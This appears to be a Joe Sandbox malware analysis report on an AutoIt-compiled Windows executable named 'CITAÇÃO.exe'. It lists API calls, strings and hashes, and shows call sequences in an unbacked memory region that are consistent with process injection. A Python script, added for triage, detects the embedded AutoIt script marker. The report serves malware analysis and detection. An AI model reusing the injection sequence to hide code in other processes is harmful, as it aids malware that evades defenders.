                                                      • ImageList_ReplaceIcon.COMCTL32(00AB1F10,000000FF,00000000), ref: 00410552
                                                      Strings
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AB1F10,000000FF,00000000), ref: 00410552
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _malloc
                                                      • String ID: Default
                                                      • API String ID: 1579825452-753088835
                                                      • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                      • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                       Control-flow Graph (rendered graph not recoverable from this page; entry block 0040F5C0, internal calls to 00422240, 00413650, 00410E60, 00414D04, 004150D1 and 00414D30, with a second code region at 00425D05-00425D5F)
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                                      • String ID: AU3!$EA06
                                                      • API String ID: 1268643489-2658333250
                                                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
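The function at 0040F5C0 above is tagged __fread_nolock_fseek_memmove_strcat and references the two strings "AU3!" and "EA06". Concatenated, these form the "AU3!EA06" marker that AutoIt v3 places in front of a compiled script embedded in its stub, so by its string and API mix this is the AutoIt runtime reading its own image and looking for the embedded script (an inference from the report's IDs, not something the report states). The Python below is an added triage example, not code from the Joe Sandbox report or from the sample: it scans a file image for the contiguous marker and for the runtime strings this report lists elsewhere ("AutoIt v3 GUI" from the window-class function, "Software\AutoIt v3\AutoIt" from the registry function), and so distinguishes a bare AutoIt interpreter from a stub that carries a script. The two sample images are constructed; the "carved" region is simply the tail of the image from the first marker onward, not the exact script bounds, which the report does not give.

```python
import hashlib

# Strings taken from the report's String IDs for this sample.
AU3_MAGIC = b"AU3!"
AU3_VERSION = b"EA06"
AU3_MARKER = AU3_MAGIC + AU3_VERSION  # contiguous form that heads a compiled script
RUNTIME_STRINGS = (
    b"AutoIt v3 GUI",                 # window class registered by the stub
    b"Software\\AutoIt v3\\AutoIt",   # registry key the stub opens
)


def find_au3_markers(data: bytes) -> list:
    """Return every offset at which the contiguous AU3!EA06 marker occurs."""
    offsets = []
    pos = data.find(AU3_MARKER)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(AU3_MARKER, pos + 1)
    return offsets


def is_autoit_runtime(data: bytes) -> bool:
    """True if the image carries the AutoIt interpreter's own strings.

    In this report the interpreter references "AU3!" and "EA06" as two
    separate strings, so a NUL-separated pair plus a runtime string is the
    interpreter; only the contiguous marker indicates an embedded script.
    """
    return any(s in data for s in RUNTIME_STRINGS)


def triage(data: bytes) -> dict:
    """Classify an image as AutoIt runtime and/or runtime with embedded script."""
    markers = find_au3_markers(data)
    # Assumption: carve from the first marker to end of image. This is a
    # convenient blob for further decoding, not the precise script length.
    carved = data[markers[0]:] if markers else b""
    return {
        "is_autoit_runtime": is_autoit_runtime(data),
        "has_embedded_script": bool(markers),
        "script_offsets": markers,
        "carved_sha256": hashlib.sha256(carved).hexdigest() if carved else None,
    }


# Constructed sample images (not real PE files): a fake MZ stub, the runtime
# strings as the interpreter holds them (AU3! and EA06 NUL-separated), then,
# for the second image, padding and the contiguous marker with placeholder
# script bytes appended, the way a compiled script would trail the stub.
RUNTIME_ONLY = (
    b"MZ" + b"\x00" * 62
    + b"AutoIt v3 GUI\x00"
    + b"AU3!\x00EA06\x00"
)

SAMPLE_IMAGE = (
    RUNTIME_ONLY
    + b"Software\\AutoIt v3\\AutoIt\x00"
    + b"\x00" * 32
    + AU3_MARKER + b"\x01\x02\x03\x04<placeholder compiled script>"
)

if __name__ == "__main__":
    for name, img in (("runtime only", RUNTIME_ONLY), ("stub + script", SAMPLE_IMAGE)):
        print(name, triage(img))
```

Run over a real file with `triage(open(path, "rb").read())`. A hit on the contiguous marker in a file that also carries the runtime strings is the pattern this sample shows; a hit in a file without them (a dropped resource, a memory region) is the script alone and is worth carving for a dedicated AutoIt decompiler.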

                                                       Control-flow Graph (rendered graph not recoverable from this page; entry block 00401100, a window procedure dispatching to DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW and CreatePopupMenu, with internal calls to 00401250, 00401000, 0040E0C0, 0040F190, 00401A50, 004370F4, 00468B0E and 0045FD57 and a second code region at 0042AFB4-0042B06D)
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                      • CreatePopupMenu.USER32 ref: 00401204
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                      • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                       Control-flow Graph (rendered graph not recoverable from this page; entry block 004115D7, internal calls to 004135BB, 00411988, 00417FC0, 0041130A, 004180AF and 00418105)
                                                      APIs
                                                      • _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                      • std::exception::exception.LIBCMT ref: 00411626
                                                      • std::exception::exception.LIBCMT ref: 00411640
                                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                      • String ID: ,*H$4*H$@fI
                                                      • API String ID: 615853336-1459471987
                                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                       Control-flow Graph (rendered graph not recoverable from this page; entry block 03F73E98 in the non-PE-backed region at 03F71000, a loop calling CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree, with internal calls to 03F718A8, 03F74DA8, 03F74FF8 and 03F74E08)
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F73F69
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F7418F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction ID: 83549b58a85267982f3420633032ef4428f68d1e7337638c041cbfbffc337081
                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction Fuzzy Hash: F2A13875E00209EBDB14DFA5C888BEEBBB5FF48304F24819AE511BB290D7759A41CF91

                                                       Control-flow Graph (rendered graph not recoverable from this page; entry block 004102B0, calling SHGetMalloc, SHGetDesktopFolder and SHGetPathFromIDListW, with internal calls to 00412FBA and 00433244 and a second code region at 00425DFD-00425E0E)
                                                      APIs
                                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                      • _wcsncpy.LIBCMT ref: 004102ED
                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                      • _wcsncpy.LIBCMT ref: 00410340
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                      • String ID: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 3170942423-1095687430
                                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                       Control-flow Graph (rendered graph not recoverable from this page; entry block 00401250, calling KillTimer and SetTimer, with internal calls to 00412F40 and 00401B80 and five Shell_NotifyIconW call sites in a second code region at 004272EC-004273B4)
                                                      APIs
                                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 3300667738-0
                                                      • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                      • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpen
                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                      • API String ID: 1586453840-614718249
                                                      • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                      • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Copy$ClearErrorLast
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 2487901850-572801152
                                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                      APIs
                                                        • Part of subcall function 03F73B48: Sleep.KERNELBASE(000001F4), ref: 03F73B59
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F73D8D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: Z8ZR7JZ8YC4AWO1JW6BX2
                                                      • API String ID: 2694422964-2825875535
                                                      • Opcode ID: bfa8c10d76bba209b72f35f54b9762f8fe1e44953a6df82f1cf2b3d8987f5b61
                                                      • Instruction ID: d8d1d4d7a33cf989be4d462e82ffb3c7adffaab3a5cc68305a07debe63f78a62
                                                      • Opcode Fuzzy Hash: bfa8c10d76bba209b72f35f54b9762f8fe1e44953a6df82f1cf2b3d8987f5b61
                                                      • Instruction Fuzzy Hash: 9851B634D1424CEBEF11DBA4C854BEEBB79AF59300F04419AE148BB2C1D7B91B49CBA5
                                                      APIs
                                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • _wcsncpy.LIBCMT ref: 00401C41
                                                      • _wcscpy.LIBCMT ref: 00401C5D
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                      • String ID: Line:
                                                      • API String ID: 1874344091-1585850449
                                                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Close$OpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 1607946009-824357125
                                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F73303
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F73399
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F733BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                      • Instruction ID: c2675b8c8df760f75585207a5886ee28015602c3c44e6f26898b823e42ea149e
